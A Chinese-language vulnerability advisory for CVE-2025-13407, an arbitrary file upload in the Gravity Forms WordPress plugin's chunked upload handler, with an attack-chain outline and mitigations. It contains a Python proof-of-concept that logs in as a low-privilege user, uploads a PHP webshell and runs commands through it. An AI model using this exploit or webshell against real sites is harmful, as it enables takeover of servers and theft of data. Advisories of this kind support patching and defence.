CVE-2025-13407: WordPress Gravity Forms插件任意文件上传漏洞导致RCE

漏洞信息

漏洞编号

CVE-2025-13407

漏洞类型

任意文件上传/远程代码执行

CVSS评分

6.8 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Gravity Forms WordPress Plugin

漏洞概述

CVE-2025-13407是WordPress流行插件Gravity Forms中的一个高危安全漏洞。该漏洞存在于插件的分块上传(Chunked Upload)功能中，由于插件未正确验证上传文件的类型和内容，允许低权限用户上传恶意PHP文件到服务器。一旦攻击者成功上传webshell，即可获得服务器的远程代码执行权限，从而完全控制受影响的WordPress站点。此漏洞的CVSS评分为6.8，属于中等严重程度，但考虑到其可能导致远程代码执行的严重后果，实际威胁程度较高。攻击成功的关键前提是攻击者需要发现或枚举出上传文件的路径，这需要结合信息泄露漏洞或暴力猜测等方式。

技术细节

Gravity Forms插件的分块上传功能存在安全缺陷，具体表现为：1) 文件类型验证不充分：插件仅检查文件扩展名或MIME类型，但未对文件内容进行深度检测；2) 上传路径可预测：分块上传的文件存储路径存在规律，攻击者可通过枚举发现文件位置；3) 权限检查绕过：虽然需要低权限用户身份，但插件允许已认证用户通过API接口上传任意文件。攻击者首先以低权限用户身份登录WordPress，然后构造包含恶意PHP代码的文件，通过分块上传接口绕过安全检查上传到服务器。上传成功后，攻击者访问该PHP文件即可在服务器上执行任意系统命令，实现远程代码执行(RCE)。

攻击链分析

STEP 1

步骤1

攻击者以低权限用户身份登录目标WordPress站点

STEP 2

步骤2

构造包含恶意PHP代码的文件，通过Gravity Forms的分块上传接口上传

STEP 3

步骤3

绕过文件类型检查，成功上传PHP webshell到服务器

STEP 4

步骤4

通过枚举或猜测发现上传文件的具体路径

STEP 5

步骤5

访问上传的PHP文件并传入恶意命令，实现远程代码执行(RCE)

STEP 6

步骤6

完全控制受影响的WordPress站点，可进一步横向移动或数据窃取

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-13407 PoC - Gravity Forms Arbitrary File Upload to RCE
# Target: WordPress site with vulnerable Gravity Forms plugin < 2.9.23.1

TARGET = "http://target-wordpress-site.com"
USERNAME = "attacker"
PASSWORD = "password"
UPLOAD_PATH = "/wp-content/uploads/gravity_forms/"

def get_auth_token():
    """Login to WordPress and get authentication cookie"""
    login_url = f"{TARGET}/wp-login.php"
    session = requests.Session()
    
    login_data = {
        'log': USERNAME,
        'pwd': PASSWORD,
        'wp-submit': 'Log In'
    }
    
    response = session.post(login_url, data=login_data)
    if 'wordpress_logged_in' in str(response.cookies):
        return session
    return None

def upload_php_shell(session):
    """Upload malicious PHP file via Gravity Forms chunked upload"""
    upload_url = f"{TARGET}/wp-admin/admin-ajax.php"
    
    # PHP webshell content
    php_shell = b'<?php if(isset($_GET["cmd"])){ system($_GET["cmd"]); } ?>' 
    
    files = {
        'file': ('shell.php', php_shell, 'application/x-php'),
        'action': 'gf_chunked_upload',
        'form_id': '1'
    }
    
    response = session.post(upload_url, files=files)
    return response.json()

def main():
    print("[*] CVE-2025-13407 PoC - Gravity Forms File Upload to RCE")
    
    # Step 1: Authenticate
    print("[*] Authenticating as low-privilege user...")
    session = get_auth_token()
    if not session:
        print("[-] Authentication failed")
        return
    print("[+] Authenticated successfully")
    
    # Step 2: Upload PHP shell
    print("[*] Uploading PHP shell...")
    result = upload_php_shell(session)
    
    if 'url' in result:
        shell_url = result['url']
        print(f"[+] Shell uploaded: {shell_url}")
        
        # Step 3: Execute RCE
        print("[*] Testing RCE...")
        rce_test = session.get(f"{shell_url}?cmd=whoami")
        if rce_test.status_code == 200:
            print(f"[+] RCE Successful! Output: {rce_test.text.strip()}")
    else:
        print("[-] Upload failed")

if __name__ == "__main__":
    main()

影响范围

Gravity Forms WordPress Plugin < 2.9.23.1

防御指南

临时缓解措施

在无法立即升级的情况下，可通过以下措施临时缓解：1) 在wp-config.php中添加代码禁用PHP文件执行；2) 修改.htaccess或nginx配置禁止uploads目录下的PHP文件执行；3) 使用第三方安全插件限制文件上传功能；4) 临时禁用Gravity Forms插件直到完成升级。同时建议检查wp-content/uploads目录是否存在可疑的PHP文件。